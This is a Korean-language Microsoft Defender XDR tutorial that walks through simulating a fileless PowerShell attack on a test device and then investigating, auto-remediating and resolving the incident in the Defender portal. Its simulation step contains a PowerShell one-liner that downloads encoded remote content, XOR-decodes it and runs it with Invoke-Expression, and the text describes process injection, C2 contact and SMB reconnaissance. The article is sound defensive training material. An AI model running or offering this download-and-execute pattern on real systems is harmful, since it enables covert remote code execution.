Microsoft Defender XDR 파일럿 환경에서 공격 시뮬레이션 실행

  • 아티클

이 문서는 파일럿 환경을 사용하여 Microsoft Defender XDR 인시던트에 대한 조사 및 대응을 수행하는 프로세스의 2단계입니다. 이 프로세스에 대한 자세한 내용은 개요 문서를 참조하세요.

파일럿 환경을 준비한 후에는 시뮬레이션된 공격으로 인시던트를 만들고 Microsoft Defender 포털을 사용하여 조사하고 대응하여 Microsoft Defender XDR 인시던트 대응 및 자동화된 조사 및 수정 기능을 테스트해야 합니다.

Microsoft Defender XDR 인시던트 는 공격의 스토리를 구성하는 상관 관계 경고 및 관련 데이터의 컬렉션입니다.

Microsoft 365 서비스 및 앱은 의심스럽거나 악의적인 이벤트 또는 활동을 검색할 때 경고를 만듭니다. 개별 경고는 완료되거나 진행 중인 공격에 대한 중요한 단서를 제공합니다. 그러나 공격은 일반적으로 디바이스, 사용자 및 사서함과 같은 다양한 유형의 엔터티에 대해 다양한 기술을 사용합니다. 결과는 테넌트에서 여러 엔터티에 대한 여러 경고입니다.

참고

보안 분석 및 인시던트 대응을 처음 접 하는 경우 첫 번째 인시던트 연습에 대응 을 참조하여 일반적인 분석, 수정 및 인시던트 후 검토 프로세스를 안내합니다.

Microsoft Defender 포털을 사용하여 공격 시뮬레이션

Microsoft Defender 포털에는 파일럿 환경에 시뮬레이션된 공격을 만드는 기본 제공 기능이 있습니다.

Office 365용 Defender 공격 시뮬레이션 훈련

Microsoft 365 E5 또는 Office 365용 Microsoft Defender 계획 2의 Office 365용 Defender 피싱 공격에 대한 공격 시뮬레이션 학습이 포함됩니다. 기본 단계는 다음과 같습니다.

  1. 시뮬레이션 Create

    새 시뮬레이션을 만들고 시작하는 방법에 대한 단계별 지침은 피싱 공격 시뮬레이션을 참조하세요.

  2. 페이로드 Create

    시뮬레이션 내에서 사용할 페이로드를 만드는 방법에 대한 단계별 지침은 공격 시뮬레이션 학습을 위한 사용자 지정 페이로드 Create 참조하세요.

  3. 인사이트 얻기

    보고를 통해 인사이트를 얻는 방법에 대한 단계별 지침은 공격 시뮬레이션 교육을 통해 인사이트 얻기를 참조하세요.

자세한 내용은 시뮬레이션을 참조하세요.

엔드포인트용 Defender 공격 자습서 & 시뮬레이션

Microsoft의 엔드포인트용 Defender 시뮬레이션은 다음과 같습니다.

  • 문서 삭제 백도어
  • 자동 조사(백도어)

타사 원본의 추가 시뮬레이션이 있습니다. 자습서 집합도 있습니다.

각 시뮬레이션 또는 자습서에 대해 다음을 수행합니다.

  1. 제공된 해당 연습 문서를 다운로드하고 읽습니다.

  2. 시뮬레이션 파일을 다운로드합니다. 테스트 디바이스에서 파일 또는 스크립트를 다운로드하도록 선택할 수 있지만 필수는 아닙니다.

  3. 연습 문서에 설명된 대로 테스트 디바이스에서 시뮬레이션 파일 또는 스크립트를 실행합니다.

자세한 내용은 시뮬레이션된 공격을 통한 엔드포인트용 Microsoft Defender 환경을 참조하세요.

격리된 도메인 컨트롤러 및 클라이언트 디바이스를 사용하여 공격 시뮬레이션(선택 사항)

이 선택적 인시던트 대응 연습에서는 PowerShell 스크립트를 사용하여 AD DS(격리된 Active Directory Domain Services) 도메인 컨트롤러 및 Windows 디바이스에 대한 공격을 시뮬레이션한 다음 인시던트를 조사, 수정 및 resolve.

먼저 파일럿 환경에 엔드포인트를 추가해야 합니다.

파일럿 환경 엔드포인트 추가

먼저 격리된 AD DS 도메인 컨트롤러와 Windows 디바이스를 파일럿 환경에 추가해야 합니다.

  1. 파일럿 환경 테넌트가 Microsoft Defender XDR 사용하도록 설정되었는지 확인합니다.

  2. 도메인 컨트롤러가 다음을 수행했는지 확인합니다.

  3. 테스트 디바이스가 다음과 같은지 확인합니다.

테넌트 및 디바이스 그룹을 사용하는 경우 테스트 디바이스에 대한 전용 디바이스 그룹을 만들고 최상위 수준으로 푸시합니다.

한 가지 대안은 AD DS 도메인 컨트롤러를 호스트하고 Microsoft Azure 인프라 서비스에서 디바이스를 가상 머신으로 테스트하는 것입니다. 시뮬레이션된 엔터프라이즈 테스트 랩 가이드의 1단계에서 지침을 사용할 수 있지만 APP1 가상 머신 만들기는 건너뛸 수 있습니다.

결과는 다음과 같습니다.

시뮬레이션된 엔터프라이즈 테스트 랩 가이드를 사용하는 평가 환경

고급 기술을 활용하여 검색에서 숨기는 정교한 공격을 시뮬레이션합니다. 이 공격은 도메인 컨트롤러에서 열린 SMB(서버 메시지 블록) 세션을 열거하고 사용자 디바이스의 최근 IP 주소를 검색합니다. 이 공격 범주는 일반적으로 피해자의 장치에 삭제된 파일을 포함하지 않으며 메모리에서만 발생합니다. 그들은 기존 시스템 및 관리 도구를 사용하여 "땅에서 생활"하고 실행을 숨기기 위해 시스템 프로세스에 코드를 주입합니다. 이러한 동작을 통해 탐지를 회피하고 디바이스에서 유지할 수 있습니다.

이 시뮬레이션에서 샘플 시나리오는 PowerShell 스크립트로 시작합니다. 실제 환경에서는 사용자가 스크립트를 실행하도록 속거나 스크립트가 이전에 감염된 디바이스에서 다른 컴퓨터로 원격 연결에서 실행될 수 있습니다. 이는 공격자가 네트워크에서 횡적으로 이동하려고 했음을 나타냅니다. 관리자는 또한 스크립트를 원격으로 실행하여 다양한 관리 작업을 수행하기 때문에 이러한 스크립트를 검색하기가 어려울 수 있습니다.

프로세스 주입 및 SMB 정찰 공격이 있는 파일리스 PowerShell 공격

시뮬레이션 중에 공격은 셸코드를 무고해 보이는 프로세스에 주입합니다. 이 시나리오에서는 notepad.exe 사용해야 합니다. 시뮬레이션을 위해 이 프로세스를 선택했지만 공격자는 svchost.exe 같은 장기 실행 시스템 프로세스를 대상으로 할 가능성이 더 큽니다. 그런 다음 셸코드는 공격자의 C2(명령 및 제어) 서버에 연결하여 진행 방법에 대한 지침을 받습니다. 스크립트는 DC(도메인 컨트롤러)에 대한 정찰 쿼리를 실행하려고 시도합니다. 정찰을 사용하면 공격자가 최근 사용자 로그인 정보에 대한 정보를 가져올 수 있습니다. 공격자가 이 정보를 가지고 나면 네트워크에서 횡적으로 이동하여 특정 중요한 계정으로 이동할 수 있습니다.

중요

최적의 결과를 보려면 공격 시뮬레이션 지침을 최대한 면밀히 따르세요.

격리된 AD DS 도메인 컨트롤러 공격 시뮬레이션 실행

공격 시나리오 시뮬레이션을 실행하려면 다음을 수행합니다.

  1. 파일럿 환경에 격리된 AD DS 도메인 컨트롤러 및 Windows 디바이스가 포함되어 있는지 확인합니다.

  2. 테스트 사용자 계정으로 테스트 디바이스에 로그인합니다.

  3. 테스트 디바이스에서 Windows PowerShell 창을 엽니다.

  4. 다음 시뮬레이션 스크립트를 복사합니다.

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    참고

    웹 브라우저에서 이 문서를 열면 특정 문자를 손실하거나 추가 줄 바꿈을 도입하지 않고 전체 텍스트를 복사하는 데 문제가 발생할 수 있습니다. 이 경우 이 문서를 다운로드하여 Adobe Reader에서 엽니다.

  5. 복사한 스크립트를 PowerShell 창에 붙여넣고 실행합니다.

참고

RDP(원격 데스크톱 프로토콜)를 사용하여 PowerShell을 실행하는 경우 CTRL-V 핫키 또는 마우스 오른쪽 클릭 붙여넣기 메서드가 작동하지 않을 수 있으므로 RDP 클라이언트에서 클립보드 텍스트 입력 명령을 사용합니다. PowerShell의 최신 버전도 해당 메서드를 허용하지 않는 경우가 있습니다. 먼저 메모리의 메모장에 복사하여 가상 머신에 복사한 다음 PowerShell에 붙여넣어야 할 수 있습니다.

몇 초 후에 메모장 앱이 열립니다. 시뮬레이션된 공격 코드가 메모장에 삽입됩니다. 자동으로 생성된 메모장 instance 열어 두면 전체 시나리오를 경험할 수 있습니다.

시뮬레이션된 공격 코드는 외부 IP 주소(C2 서버 시뮬레이션)와 통신한 다음 SMB를 통해 도메인 컨트롤러에 대한 정찰을 시도합니다.

이 스크립트가 완료되면 PowerShell 콘솔에 이 메시지가 표시됩니다.

ran NetSessionEnum against [DC Name] with return code result 0

자동화된 인시던트 및 대응 기능이 작동하는 것을 확인하려면 notepad.exe 프로세스를 열어 두세요. 자동화된 인시던트 및 응답이 메모장 프로세스를 중지하는 것을 볼 수 있습니다.

시뮬레이션된 공격에 대한 인시던트 조사

참고

이 시뮬레이션을 진행하기 전에 다음 비디오를 watch 인시던트 관리를 통해 관련 경고를 조사 프로세스의 일부로 구성하는 방법, 포털에서 찾을 수 있는 위치 및 보안 작업에 도움이 되는 방법을 확인합니다.

SOC 분석가의 관점으로 전환하면 이제 Microsoft Defender 포털에서 공격을 조사할 수 있습니다.

  1. Microsoft Defender 포털을 엽니다.

  2. 탐색 창에서 인시던트 & 경고 인시던트 >를 선택합니다.

  3. 시뮬레이션된 공격에 대한 새 인시던트가 인시던트 큐에 표시됩니다.

    인시던트 큐의 예

단일 인시던트로 공격 조사

Microsoft Defender XDR 분석을 상호 연결하고 서로 다른 제품의 모든 관련 경고 및 조사를 하나의 인시던트 엔터티로 집계합니다. 이렇게 하면 Microsoft Defender XDR SOC 분석가가 복잡한 위협을 이해하고 대응할 수 있도록 더 광범위한 공격 스토리를 보여 줍니다.

이 시뮬레이션 중에 생성된 경고는 동일한 위협과 연결되며 결과적으로 단일 인시던트로 자동으로 집계됩니다.

인시던트 보기:

  1. Microsoft Defender 포털을 엽니다.

  2. 탐색 창에서 인시던트 & 경고 인시던트 >를 선택합니다.

  3. 인시던트 이름 왼쪽에 있는 원을 클릭하여 최신 항목을 선택합니다. 측면 패널에는 모든 관련 경고를 포함하여 인시던트에 대한 추가 정보가 표시됩니다. 각 인시던트에는 포함된 경고의 특성에 따라 설명하는 고유한 이름이 있습니다.

    dashboard 표시되는 경고는 서비스 리소스(Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, 엔드포인트용 Microsoft Defender)에 따라 필터링할 수 있습니다. Microsoft Defender XDR 및 Office 365용 Microsoft Defender.

  4. 인시던트 열기 페이지를 선택하여 인시던트에 대한 자세한 정보를 가져옵니다.

    인시던트 페이지에서 인시던트와 관련된 모든 경고 및 정보를 볼 수 있습니다. 이 정보에는 경고에 관련된 엔터티 및 자산, 경고의 검색 원본(예: Microsoft Defender for Identity 또는 엔드포인트용 Microsoft Defender) 및 함께 연결된 이유가 포함됩니다. 인시던트 경고 목록을 검토하면 공격의 진행률이 표시됩니다. 이 보기에서 개별 경고를 보고 조사할 수 있습니다.

    오른쪽 메뉴에서 인시던트 관리를 클릭하여 인시던트에 태그를 지정하고, 자신에게 할당하고, 메모를 추가할 수도 있습니다.

생성된 경고 검토

시뮬레이션된 공격 중에 생성된 경고 중 일부를 살펴보겠습니다.

참고

시뮬레이션된 공격 중에 생성된 몇 가지 경고만 살펴보겠습니다. 테스트 디바이스에서 실행되는 Windows 버전 및 Microsoft Defender XDR 제품에 따라 약간 다른 순서로 표시되는 더 많은 경고가 표시될 수 있습니다.

생성된 경고의 예

경고: 의심스러운 프로세스 주입 관찰됨(원본: 엔드포인트용 Microsoft Defender)

고급 공격자는 정교하고 은밀한 방법을 사용하여 메모리를 유지하며 검색 도구에서 숨깁니다. 한 가지 일반적인 기술은 악의적인 실행 파일이 아닌 신뢰할 수 있는 시스템 프로세스 내에서 작동하여 검색 도구 및 보안 작업이 악성 코드를 발견하기 어렵게 만드는 것입니다.

SOC 분석가가 이러한 고급 공격을 포착할 수 있도록 엔드포인트용 Microsoft Defender 심층 메모리 센서는 클라우드 서비스에 다양한 프로세스 간 코드 주입 기술에 대한 전례 없는 가시성을 제공합니다. 다음 그림에서는 엔드포인트용 Defender가 notepad.exe코드를 삽입하려고 시도했을 때 검색하고 경고하는 방법을 보여줍니다.

잠재적으로 악의적인 코드를 삽입하기 위한 경고의 예

경고: 명령줄 인수 없이 프로세스 실행에서 관찰되는 예기치 않은 동작(원본: 엔드포인트용 Microsoft Defender)

엔드포인트용 Microsoft Defender 검색은 종종 공격 기술의 가장 일반적인 특성을 대상으로 합니다. 이 메서드는 내구성을 보장하고 공격자가 최신 전술로 전환할 수 있는 기준을 높입니다.

우리는 대규모 학습 알고리즘을 사용하여 organization 및 전 세계적으로 일반적인 프로세스의 정상적인 동작을 설정하고 이러한 프로세스가 비정상적인 동작을 표시하는 경우를 watch. 이러한 비정상적인 동작은 종종 불필요한 코드가 도입되었고 신뢰할 수 없는 프로세스에서 실행되고 있음을 나타냅니다.

이 시나리오의 경우 notepad.exe 프로세스는 외부 위치와의 통신과 관련된 비정상적인 동작을 나타냅니다. 이 결과는 악성 코드를 도입하고 실행하는 데 사용되는 특정 방법과는 독립적입니다.

참고

이 경고는 추가 백 엔드 처리가 필요한 기계 학습 모델을 기반으로 하기 때문에 포털에서 이 경고가 표시되기까지 다소 시간이 걸릴 수 있습니다.

경고 세부 정보에는 조사를 확장하기 위해 피벗으로 사용할 수 있는 표시기인 외부 IP 주소가 포함됩니다.

경고 프로세스 트리에서 IP 주소를 선택하여 IP 주소 세부 정보 페이지를 봅니다.

명령줄 인수 없이 실행되는 프로세스의 예기치 않은 동작 예제

다음 그림에서는 선택한 IP 주소 세부 정보 페이지(경고 프로세스 트리에서 IP 주소를 클릭)를 표시합니다.

IP 주소 세부 정보 페이지의 예

경고: 사용자 및 IP 주소 정찰(SMB)(원본: Microsoft Defender for Identity)

SMB(서버 메시지 블록) 프로토콜을 사용하여 열거하면 공격자가 네트워크를 통해 횡적으로 이동하여 특정 중요한 계정에 액세스하는 데 도움이 되는 최신 사용자 로그온 정보를 가져올 수 있습니다.

이 검색에서 SMB 세션 열거형이 도메인 컨트롤러에 대해 실행될 때 경고가 트리거됩니다.

사용자 및 IP 주소 정찰에 대한 Microsoft Defender for Identity 경고의 예

엔드포인트용 Microsoft Defender 사용하여 디바이스 타임라인 검토

이 인시던트에서 다양한 경고를 탐색한 후 이전에 조사한 인시던트 페이지로 다시 이동합니다. 인시트 페이지에서 디바이스 탭을 선택하여 엔드포인트용 Microsoft Defender 보고한 이 인시던트와 관련된 디바이스를 검토하고 Microsoft Defender for Identity.

공격이 수행된 디바이스의 이름을 선택하여 해당 특정 디바이스에 대한 엔터티 페이지를 엽니다. 해당 페이지에서 트리거된 경고 및 관련 이벤트를 볼 수 있습니다.

시간 표시 막대 탭을 선택하여 디바이스 타임라인 열고 디바이스에서 관찰된 모든 이벤트 및 동작을 시간순으로 보고, 발생한 경고와 함께 산재합니다.

동작이 있는 디바이스 타임라인 예

더 흥미로운 동작 중 일부를 확장하면 프로세스 트리와 같은 유용한 세부 정보가 제공됩니다.

예를 들어 경고 이벤트 의심스러운 프로세스 주입이 관찰될 때까지 아래로 스크롤합니다. 아래의 notepad.exe 프로세스 이벤트에 삽입된powershell.exe 선택하여 측면 창의 이벤트 엔터티 그래프 아래에 이 동작에 대한 전체 프로세스 트리를 표시합니다. 필요한 경우 검색 창을 사용하여 필터링합니다.

선택한 PowerShell 파일 만들기 동작에 대한 프로세스 트리의 예

Microsoft Defender for Cloud Apps 사용하여 사용자 정보 검토

인시던트 페이지에서 사용자 탭을 선택하여 공격에 관련된 사용자 목록을 표시합니다. 테이블에는 각 사용자의 조사 우선 순위 점수를 포함하여 각 사용자에 대한 추가 정보가 포함되어 있습니다.

사용자 이름을 선택하여 추가 조사를 수행할 수 있는 사용자의 프로필 페이지를 엽니다. 위험한 사용자 조사에 대해 자세히 알아보세요.

Defender for Cloud Apps 사용자 페이지

자동화된 조사 및 수정

참고

이 시뮬레이션을 진행하기 전에 다음 비디오를 watch 자동화된 자가 복구가 무엇인지, 포털에서 찾을 수 있는 위치 및 보안 작업에 어떻게 도움이 되는지 알아봅니다.

Microsoft Defender 포털에서 인시던트로 다시 이동합니다. 인시던트 페이지의 조사 탭에는 Microsoft Defender for Identity 및 엔드포인트용 Microsoft Defender 의해 트리거된 자동화된 조사가 표시됩니다. 아래 스크린샷은 엔드포인트용 Defender에서 트리거한 자동화된 조사만 표시합니다. 기본적으로 엔드포인트용 Defender는 큐에 있는 아티팩트를 자동으로 수정하므로 수정이 필요합니다.

인시던트 관련 자동화된 조사의 예

조사를 트리거한 경고를 선택하여 조사 세부 정보 페이지를 엽니다. 다음 세부 정보가 표시됩니다.

  • 자동화된 조사를 트리거한 경고입니다.
  • 영향을 받은 사용자 및 디바이스. 추가 디바이스에서 표시기가 발견되면 이러한 추가 디바이스도 나열됩니다.
  • 증거 목록입니다. 파일, 프로세스, 서비스, 드라이버 및 네트워크 주소와 같은 엔터티를 찾아 분석합니다. 이러한 엔터티는 경고와 가능한 관계를 분석하고 무해하거나 악의적인 것으로 평가됩니다.
  • 위협이 발견되었습니다. 조사 중에 발견된 알려진 위협입니다.

참고

타이밍에 따라 자동화된 조사가 계속 실행 중일 수 있습니다. 증거를 수집하고 분석하고 결과를 검토하기 전에 프로세스가 완료되기까지 몇 분 정도 기다립니다. 조사 세부 정보 페이지를 새로 고쳐 최신 결과를 가져옵니다.

조사 세부 정보 페이지의 예

자동화된 조사 중에 엔드포인트용 Microsoft Defender 수정이 필요한 아티팩트 중 하나로 삽입된 notepad.exe 프로세스를 식별했습니다. 엔드포인트용 Defender는 자동화된 수정의 일부로 의심스러운 프로세스 주입을 자동으로 중지합니다.

테스트 디바이스의 실행 중인 프로세스 목록에서 notepad.exe 사라지는 것을 볼 수 있습니다.

인시던트 해결

조사가 완료되고 수정이 확인되면 인시던트를 resolve.

인시던트 페이지에서 인시던트관리를 선택합니다. 상태 인시던트 해결로 설정하고, 결정에 대한 분류 및 보안 테스트에 대한 True 경고를 선택합니다.

인시던트 resolve 스위치를 클릭할 수 있는 인시던트 관리 패널이 열려 있는 인시던트 페이지의 예

인시던트가 해결되면 Microsoft Defender 포털 및 관련 포털에서 연결된 모든 경고를 해결합니다.

인시던트 분석, 자동화된 조사 및 인시던트 해결을 위한 공격 시뮬레이션을 마무리합니다.

다음 단계

Microsoft Defender XDR 인시던트 대응 기능

2단계 중 2단계: 인시던트 대응 기능 Microsoft Defender XDR 시도

Microsoft Defender XDR 평가 환경 Create

더 자세히 알아보고 싶으신가요? 기술 커뮤니티: Microsoft Defender XDR Tech Community의 Microsoft 보안 커뮤니티와 Engage.